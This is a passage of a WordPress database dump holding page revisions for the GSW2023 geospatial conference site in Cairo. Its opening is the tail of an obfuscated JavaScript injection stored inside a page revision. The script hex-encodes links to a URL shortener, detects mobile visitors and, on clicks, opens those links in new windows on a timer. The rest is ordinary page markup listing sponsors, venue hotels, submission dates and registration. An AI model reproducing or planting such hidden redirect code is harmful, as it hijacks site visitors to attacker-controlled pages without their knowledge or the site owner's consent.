\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-24 23:32:12','2023-05-24 23:32:12','',3066,'https://gsw2023.com/?p=4570',0,'revision','',0),
(4571,1,'2023-05-24 23:32:48','2023-05-24 23:32:48','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a 